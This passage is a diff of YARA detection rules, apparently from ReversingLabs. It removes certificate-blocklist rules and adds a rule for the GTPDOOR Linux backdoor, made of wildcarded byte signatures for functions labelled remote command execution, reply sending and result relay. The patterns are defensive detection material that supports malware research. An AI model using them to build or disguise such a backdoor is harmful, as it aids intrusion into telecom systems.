+            89 DF E8 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 89
+            E2 48 89 C6 4C 89 EF E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ??
+            48 89 EF E8 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B 84 24
+            ?? ?? ?? ?? 48 29 F8 48 C1 F8 ?? 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 8B 06 85 C0 0F 84
+            ?? ?? ?? ?? 48 8D 5C 24 ?? 31 C0 B9 ?? ?? ?? ?? 45 85 FF 48 89 DF F3 48 AB 0F 85 ??
+            ?? ?? ?? 44 8B 7C 24 ?? 45 85 FF 74 ?? 31 C0 B9 ?? ?? ?? ?? 48 89 DF F3 48 AB 8B 54
+            24 ?? 48 8D 35 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 EF
+            E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ??
+            E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bit9, Inc" and pe.signatures [ i ] . serial == "7c:c1:db:2a:d0:a2:90:a4:bf:e7:a5:f3:36:d6:80:0c" and 1342051200 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( $load_embedded_library ) and ( all of ( $decrypt_embedded_library_* ) ) and ( all of ( $remove_backdoor_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_13C8351Aece71C731158980F575F4133 : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_GTPDOOR : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GTPDOOR backdoor."
 		author = "ReversingLabs"
-		id = "b6a1eb97-f0da-571e-951c-57f49cf62057"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "9e6df856-fe54-504c-8530-321adc91cd5a"
+		date = "2024-09-10"
+		modified = "2024-09-10"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L99-L115"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f96723845adc8030b72c119311103d5c2cf136e79de226d31141d8b925ce8e75"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Linux.Backdoor.GTPDOOR.yara#L1-L264"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b7b4b33b7838142e34c6d02260b6585305c4730c90e12b1adc099f9aeecf071a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "GTPDOOR"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Opera Software ASA" and pe.signatures [ i ] . serial == "13:c8:35:1a:ec:e7:1c:73:11:58:98:0f:57:5f:41:33" and 1371513600 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_4531954F6265304055F66Ce4F624F95B : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "da1aaa4c-ac71-5c4c-b663-3d1b57d69040"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L117-L133"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "58d3a2a5e3f6730f329bddb171ad6332794fa95848825b892c3b8324f503ae89"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$send_result_to_peer_v1_p1 = {
+            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 66 89 85 ?? ?? ?? ?? 66 89 95
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89
+            14 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 81 BD ?? ?? ?? ?? ?? ?? 77 ?? 0F B7 8D
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 55 ?? 89 C7 89 D6 FC F3 A4 EB ?? 8D 85 ?? ?? ?? ??
+            8B 55 ?? 89 C1 B8 ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 89 0C 24 E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 50 ??
+            8B 55 ?? 8B 45 ?? 89 42 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 89 C2 8D 85 ?? ?? ??
+            ?? 01 D0 89 45 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 0F B7 40 ?? 66 89 45 ?? 8B 45
+            ?? 0F B7 10 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B7 45 ?? 66 89 02 8B 45 ?? 89 C2 8D 85
+            ?? ?? ?? ?? 01 D0 89 45 ?? 8B 45 ?? C6 40 ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ??
+            89 C2 8D 85 ?? ?? ?? ?? 01 D0 89 45 ?? 8B 45 ?? 66 C7 40 ?? ?? ?? 66 81 BD ?? ?? ??
+            ?? ?? ?? 76 ?? 8B 45 ?? 83 C0 ?? BA ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
+            8B 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? C7 04 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 66 C7 40 ?? ?? ?? EB ?? 8B
+            45 ?? 83 C0 ?? 0F B7 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 8B 45 ??
+            89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 83
+        }
+		$send_result_to_peer_v1_p2 = {
+            C0 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B7 85
+            ?? ?? ?? ?? 66 89 42 ?? 8B 45 ?? 0F B7 40 ?? 83 C0 ?? 0F B7 C0 89 04 24 E8 ?? ?? ??
+            ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 0F B7 50 ?? 8B 45 ?? 0F B7 40 ?? 8D 04 02 8D
+            50 ?? 8B 45 ?? 66 89 50 ?? 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 89
+            C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 66 89
+            45 ?? 8B 45 ?? 66 C7 40 ?? ?? ?? 0F B7 4D ?? 8B 5D ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 8B
+            40 ?? 89 4C 24 ?? 89 5C 24 ?? 89 54 24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B6 42 ?? 83 C8 ?? 88 42 ?? 0F B7 45 ??
+            83 C0 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 66 C7
+            40 ?? ?? ?? 0F B7 45 ?? 83 C0 ?? 8D 95 ?? ?? ?? ?? 89 44 24 ?? 89 14 24 E8 ?? ?? ??
+            ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? ??
+            ?? ?? ?? 8B 45 ?? 0F B7 40 ?? 66 89 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 0F B7 45 ?? 83
+            C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8D 85
+            ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F
+            5D C3
+        }
+		$execute_remote_command_v1 = {
+            55 89 E5 57 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ??
+            B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 03 45
+            ?? 66 C7 00 ?? ?? C6 40 ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B
+            7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 66 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ??
+            ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 0F B7 45 ?? 89 C2 03 55 ?? 8B 45 ?? 89 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 45 ??
+            B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 0F B7 C0 89 45 ?? EB ?? 8B 45
+            ?? 89 04 24 E8 ?? ?? ?? ?? 88 45 ?? 80 7D ?? ?? 74 ?? 0F B7 45 ?? 89 C2 03 55 ?? 0F
+            B6 45 ?? 88 02 66 83 45 ?? ?? 66 81 7D ?? ?? ?? 76 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ??
+            ?? 0F B7 45 ?? 89 45 ?? 8B 45 ?? 83 C4 ?? 5F 5D C3
+        }
+		$send_reply_v1_p1 = {
+            55 89 E5 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89
+            45 ?? 8D 85 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89
+            14 24 E8 ?? ?? ?? ?? 8B 55 ?? 0F B6 02 83 E0 ?? 83 C8 ?? 88 02 8B 55 ?? 0F B6 02 83
+            E0 ?? 83 C8 ?? 88 02 8B 45 ?? C6 40 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2
+            8B 45 ?? 66 89 50 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ??
+            C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 E0 ?? 8B 55 ?? 89 C1 83 E1 ?? 0F B6 42 ?? 83
+            E0 ?? 09 C8 88 42 ?? 8B 45 ?? 0F B6 50 ?? 8B 45 ?? 88 50 ?? 8B 45 ?? C6 40 ?? ?? 8B
+            45 ?? 8B 50 ?? 8B 45 ?? 89 50 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 50 ?? C7 44 24 ?? ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45
+            ?? 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 04 24 E8 ?? ?? ??
+            ?? 89 45 ?? 8B 45 ?? 0F B7 50 ?? 8B 45 ?? 66 89 10 8B 45 ?? 0F B7 10 8B 45 ?? 66 89
+            50 ?? 8B 45 ?? 0F B6 40 ?? 3C ?? 75 ?? 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 04 24 E8 ??
+            ?? ?? ?? 66 89 45 ?? 0F B7 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ??
+            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 89 50 ?? 8B 45 ?? 89 04 24 E8 ?? ??
+            ?? ?? 89 C2 8B 45 ?? 89 50 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66
+            89 50 ?? EB ?? 8B 45 ?? 0F B6 40 ?? 3C ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            89 C2 8B 45 ?? 89 50 ?? 8B 45 ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 89
+        }
+		$send_reply_v1_p2 = {
+            50 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B6
+            42 ?? 83 E0 ?? 88 42 ?? 8B 55 ?? 0F B6 42 ?? 83 E0 ?? 83 C8 ?? 88 42 ?? 8B 45 ?? C6
+            40 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 8B
+            40 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6
+            85 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 02 89 01 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ??
+            8D 85 ?? ?? ?? ?? 8D 48 ?? 8B 55 ?? 8B 02 89 01 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ??
+            8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04
+            24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 44
+            24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ??
+            89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 8B
+            45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 55 ?? 8B 02 89 01 8B 42 ?? 89
+        }
+		$send_reply_v1_p3 = {
+            41 ?? 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8D 85 ?? ?? ?? ?? 8D 48
+            ?? 8B 55 ?? 8B 02 89 01 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8B 42
+            ?? 89 41 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 95
+            ?? ?? ?? ?? A1 ?? ?? ?? ?? 39 C2 0F 85 ?? ?? ?? ?? 8B 45 ?? 0F B6 40 ?? 3C ?? 74 ??
+            8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 8B 04 C5 ?? ?? ?? ?? 85 C0 75
+            ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 8B 14 C5 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? 29 D0 89 C1 B8 ?? ?? ?? ?? D3 E0 89 45 ?? 8B 45 ?? 8B 04 C5 ?? ?? ?? ?? 23
+            45 ?? 89 45 ?? 8B 45 ?? 23 45 ?? 89 45 ?? 8B 45 ?? 3B 45 ?? 75 ?? C7 45 ?? ?? ?? ??
+            ?? EB ?? 83 45 ?? ?? 83 7D ?? ?? 7E ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ??
+            ?? 75 ?? 8B 45 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
+            8B 0D ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+        }
+		$daemon_already_running_check_v1 = {
+            55 89 E5 57 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 74 ?? E8
+            ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? EB ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE
+            89 C8 F7 D0 83 E8 ?? 83 C0 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 5F 5D C3
+        }
+		$send_result_to_peer_v2_p1 = {
+            55 48 89 E5 48 81 EC ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 48 89 8D ??
+            ?? ?? ?? 44 89 C0 66 89 95 ?? ?? FF FF 66 89 85 ?? ?? FF FF 48 8D BD ?? ?? ?? ?? BA
+            ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 81 BD ?? ?? FF FF
+            ?? ?? 77 ?? 0F B7 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C7
+            48 89 D6 FC F3 A4 EB ?? 48 8D 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C7 48 89 D6
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 8B 40 ??
+            89 45 ?? 48 8B 45 ?? 8B 50 ?? 48 8B 45 ?? 89 50 ?? 48 8B 55 ?? 8B 45 ?? 89 42 ?? 8B
+            45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89
+            45 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 48 8B 45 ?? 0F B7 40 ?? 66 89 45 ?? 48 8B 45 ?? 0F
+            B7 10 48 8B 45 ?? 66 89 50 ?? 48 8B 55 ?? 0F B7 45 ?? 66 89 02 8B 45 ?? 48 98 48 89
+            C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? C6 40 ?? ?? 8B 45 ?? 83 C0
+            ?? 89 45 ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? 48 8B
+            45 ?? 66 C7 40 ?? ?? ?? 66 81 BD ?? ?? FF FF ?? ?? 76 ?? 48 8B 45 ?? 48 83 C0 ?? BF
+            ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 49 89 C0 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ??
+            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 66 C7 40
+            ?? ?? ?? EB ?? 48 8B 45 ?? 48 83 C0 ?? 0F B7 8D ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8B 95
+            ?? ?? ?? ?? 49 89 C0 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 83 C0 ?? 0F
+        }
+		$send_result_to_peer_v2_p2 = {
+            B7 F8 E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 55 ?? 0F B7 85 ?? ?? ?? ??
+            66 89 42 ?? 48 8B 45 ?? 0F B7 40 ?? 83 C0 ?? 0F B7 F8 E8 ?? ?? ?? ?? 89 C2 48 8B 45
+            ?? 66 89 50 ?? 48 8B 45 ?? 0F B7 50 ?? 48 8B 45 ?? 0F B7 40 ?? 8D 04 02 8D 50 ?? 48
+            8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 F8 E8 ?? ?? ?? ?? 89 C2 48 8B 45
+            ?? 66 89 50 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 F8 E8 ?? ?? ?? ?? 66 89 45 ?? 48 8B 45
+            ?? 66 C7 40 ?? ?? ?? 0F B7 4D ?? 48 8B 7D ?? 48 8B 45 ?? 8B 50 ?? 48 8B 45 ?? 8B 70
+            ?? 41 89 C8 48 89 F9 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48
+            8B 55 ?? 0F B6 42 ?? 83 C8 ?? 88 42 ?? 0F B7 45 ?? 83 C0 ?? 0F B7 F8 E8 ?? ?? ?? ??
+            89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 66 C7 40 ?? ?? ?? 0F B7 45 ?? 83 C0 ?? 89
+            C6 48 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 8B
+            40 ?? 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 8B 45 ?? 0F B7 40 ?? 66 89 85
+            ?? ?? FF FF 48 8D 95 ?? ?? ?? ?? 0F B7 45 ?? 48 83 C0 ?? 48 8D B5 ?? ?? ?? ?? 8B BD
+            ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89 D0 B9 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? C9 C3
+        }
+		$execute_remote_command_v2 = {
+            55 48 89 E5 48 83 EC ?? 48 89 7D ?? 48 89 75 ?? 48 8B 75 ?? 48 8B 7D ?? E8 ?? ?? ??
+            ?? 48 8B 45 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 45 ?? B8 ?? ?? ?? ?? FC 48 8B 7D ?? F2 AE
+            48 89 C8 48 F7 D0 48 83 E8 ?? 48 03 45 ?? 66 C7 00 ?? ?? C6 40 ?? ?? 48 8B 45 ?? 48
+            C7 C1 ?? ?? ?? ?? 48 89 45 ?? B8 ?? ?? ?? ?? FC 48 8B 7D ?? F2 AE 48 89 C8 48 F7 D0
+            48 83 E8 ?? 66 89 45 ?? 48 8B 7D ?? BE ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            98 48 89 45 ?? 48 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 48 8B 7D
+            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 45 ?? 48 89 C7 48 03 7D ?? 48 8B 55 ?? BE ??
+            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 45 ??
+            B8 ?? ?? ?? ?? FC 48 8B 7D ?? F2 AE 48 89 C8 48 F7 D0 48 83 E8 ?? 0F B7 C0 89 45 ??
+            EB ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 88 45 ?? 80 7D ?? ?? 74 ?? 0F B7 45 ?? 48 89 C2 48
+            03 55 ?? 0F B6 45 ?? 88 02 66 83 45 ?? ?? 66 81 7D ?? ?? ?? 76 ?? 48 8B 7D ?? B8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 45 ?? 89 45 ?? 8B 45 ?? C9 C3
+        }
+		$main_routine_v2_p1 = {
+            55 48 89 E5 48 81 EC ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 48 8D BD ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85
+            ?? ?? ?? ?? 48 8B 00 48 C7 C1 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 48
+            8B BD ?? ?? ?? ?? F2 AE 48 89 C8 48 F7 D0 48 83 E8 ?? 48 83 F8 ?? 76 ?? 48 8B 85 ??
+            ?? ?? ?? 48 8B 00 48 C7 C1 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 48 8B
+            BD ?? ?? ?? ?? F2 AE 48 89 C8 48 F7 D0 48 8D 50 ?? 48 8B 85 ?? ?? ?? ?? 48 8B 00 48
+            89 C7 FC 48 89 D1 B8 ?? ?? ?? ?? F3 AA 48 8B 85 ?? ?? ?? ?? 48 8B 00 C7 00 ?? ?? ??
+            ?? C7 40 ?? ?? ?? ?? ?? 66 C7 40 ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
+            ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ??
+            75 ?? E8 ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 8D ??
+            ?? ?? ?? 8B 7D ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
+            C0 79 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 BA ?? ??
+            ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 8B 7D ?? B9 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 7E ?? 48 8D 85 ?? ?? ?? ?? 48 89 45
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89
+        }
+		$main_routine_v2_p2 = {
+            45 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 F8 E8 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 8B 45 ?? 83
+            C0 ?? 89 45 ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? 8B
+            45 ?? 83 C0 ?? 89 45 ?? 48 8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 48
